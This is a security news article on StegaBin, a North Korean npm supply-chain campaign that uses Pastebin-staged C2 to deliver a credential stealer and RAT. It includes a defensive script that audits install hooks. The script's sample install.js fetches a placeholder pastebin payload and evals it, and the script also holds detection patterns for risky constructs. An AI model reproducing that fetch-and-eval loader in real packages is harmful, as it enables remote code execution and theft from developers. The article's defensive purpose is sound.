StegaBin Resurfaces: North Korean Actors Push 26 Malicious npm Packages with Pastebin-Based C2
A fresh wave of malicious npm packages has been attributed to the North Korean threat cluster known as Famous Chollima, marking a new phase in the long-running Contagious Interview campaign. Researchers have identified 26 weaponized packages published to the npm ecosystem, all disguised as legitimate developer utilities.
This iteration, tracked as StegaBin, targets software developers directly. Once installed, the packages deploy a credential stealer and a cross-platform remote access trojan designed to operate across Windows, macOS, and Linux environments.
How the Attack Works
The infection chain begins with a seemingly harmless npm dependency. Embedded within each malicious package is an install.js script that executes during installation. Rather than connecting directly to a visible command-and-control endpoint, the script retrieves data from Pastebin-hosted essays.
Hidden inside these essays are steganographically embedded references to C2 domains hosted on Vercel infrastructure. The loader extracts these domains and uses them to fetch second-stage payloads. This layered approach obscures infrastructure indicators and complicates detection efforts.
By separating initial access from C2 delivery and embedding configuration within legitimate text content, the attackers significantly reduce the visibility of their command infrastructure.
Capabilities of the Cross-Platform RAT
The deployed malware functions as both a credential harvester and a fully capable remote access trojan. It establishes persistence within Visual Studio Code environments, allowing it to persist across reboots and editor sessions.
Observed capabilities include:
- Keylogging to capture developer credentials and passphrases
- Browser credential theft targeting saved passwords and session cookies
- Cryptocurrency wallet credential harvesting
- Execution of TruffleHog-style scanning to identify exposed secrets
- Git repository and SSH key exfiltration
By targeting developers, the attackers aim not merely to compromise endpoints but to gain access to source code repositories, CI/CD environments, cloud credentials, and software supply chains downstream.
Developer Ecosystem as a Strategic Target
The Contagious Interview campaign has historically focused on infiltrating development environments under the guise of job recruitment, testing assignments, or coding exercises. This new approach shifts the vector to npm packages, leveraging the trust developers place in open-source tooling.
Supply chain compromises within package registries offer scalable access. A single infected dependency can cascade into multiple enterprise environments if adopted by widely used projects.
The use of install-time scripts further increases the likelihood of successful execution, as many developers do not scrutinize dependency installation hooks.
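Because install hooks are the step most developers never read, one practical control is to audit a package's lifecycle scripts before they run. The following is an added example written for this article, not code from the campaign, from npm, or from any named tool: it reads a package manifest, resolves each `preinstall`/`install`/`postinstall`/`prepare` hook to the script it executes, and flags constructs a defender would want to see first (paste-site retrieval, outbound HTTP, dynamic code execution, base64 decoding, child-process spawning). The manifest, the `install.js` body and the indicator patterns are constructed assumptions for illustration; they are not the actual StegaBin code, and the URL is a placeholder.

```javascript
// Added example (not from the article, the campaign or npm): audit a package
// manifest for install-time lifecycle hooks and flag risky constructs in the
// script each hook runs. Sample data below is constructed for illustration.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicator patterns are an assumed defender heuristic, not a signature for
// any specific malware family.
const RISK_PATTERNS = [
  { name: "paste-site retrieval", re: /pastebin\.com/i },
  { name: "outbound HTTP request", re: /\b(?:https?\.get|fetch|axios\.get)\s*\(/ },
  { name: "dynamic code execution", re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: "child process spawn", re: /child_process|\b(?:exec|execSync|spawn)\s*\(/ },
  { name: "base64 decoding", re: /['"]base64['"]|\batob\s*\(/ },
];

// readScript maps a script path named in the manifest to its contents (a
// filesystem read in practice; an in-memory lookup here so the example runs
// offline). Returns one finding per lifecycle hook present in the manifest.
function auditManifest(manifest, readScript) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    // "node install.js"-style hooks: inspect the file the hook executes;
    // for anything else inspect the command line itself.
    const match = command.match(/\bnode\s+(\S+\.js)\b/);
    const body = match ? (readScript(match[1]) ?? "") : command;
    const indicators = RISK_PATTERNS
      .filter((p) => p.re.test(body))
      .map((p) => p.name);
    findings.push({ hook, command, indicators, risky: indicators.length > 0 });
  }
  return findings;
}

// Constructed sample: a manifest that looks like a harmless utility but runs a
// script on install. The script body is an illustrative stand-in with a
// placeholder URL, not real malware.
const SAMPLE_MANIFEST = {
  name: "example-dev-utility",
  version: "1.0.0",
  scripts: { postinstall: "node install.js", test: "mocha" },
};
const SAMPLE_FILES = {
  "install.js": [
    "const https = require('https');",
    "https.get('https://pastebin.com/raw/PLACEHOLDER_ID', (res) => {",
    "  let text = '';",
    "  res.on('data', (c) => (text += c));",
    "  res.on('end', () => eval(Buffer.from(text, 'base64').toString()));",
    "});",
  ].join("\n"),
};

function runSample() {
  return auditManifest(SAMPLE_MANIFEST, (p) => SAMPLE_FILES[p]);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of runSample()) {
    const verdict = f.risky ? f.indicators.join(", ") : "no indicators";
    console.log(`${f.hook}: "${f.command}" -> ${verdict}`);
  }
}
```

Pattern matching of this kind is a triage aid, not a verdict; a hook that fetches from a paste site and evaluates what it receives warrants a block, while a hook that merely compiles a native addon does not. For teams that cannot review every hook, npm's own `ignore-scripts=true` setting in `.npmrc` (or `npm ci --ignore-scripts`) prevents lifecycle scripts from running at all, at the cost of having to opt in the few packages that genuinely need them.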
Steganography and Infrastructure Evasion
The StegaBin loader’s reliance on Pastebin essays for configuration retrieval demonstrates evolving tradecraft. Instead of embedding hardcoded C2 domains within the malware itself, attackers use publicly accessible content platforms to dynamically stage operational data.
This technique allows rapid rotation of backend infrastructure while minimizing static indicators within package source code. Hosting C2 domains on Vercel adds another layer of legitimacy, as traffic appears to originate from widely trusted cloud infrastructure.
Implications for Software Supply Chain Security
The campaign reinforces a persistent risk within open-source ecosystems: dependency trust is often implicit. Automated build pipelines, continuous integration systems, and rapid prototyping workflows frequently pull packages without deep inspection.
Organizations should enforce strict dependency governance policies, including:
- Lockfile verification and integrity checks
- Monitoring for suspicious install-time scripts
- Restricting outbound connections from development environments
- Implementing secrets scanning within repositories
- Auditing VS Code extensions and persistence artifacts
For high-risk development teams, isolating build environments from production credentials and implementing ephemeral developer workstations can significantly reduce blast radius.
A Continuing Pattern
Famous Chollima has consistently targeted developers as a means to infiltrate broader supply chains. The StegaBin variant shows a maturation in concealment techniques, blending steganography, legitimate cloud services, and multi-platform payloads into a cohesive operation.
As developer tooling ecosystems grow more interconnected, the attack surface expands accordingly. The lesson is clear: security cannot stop at the perimeter. It must extend into the code editor, the package manager, and every dependency that enters the build pipeline.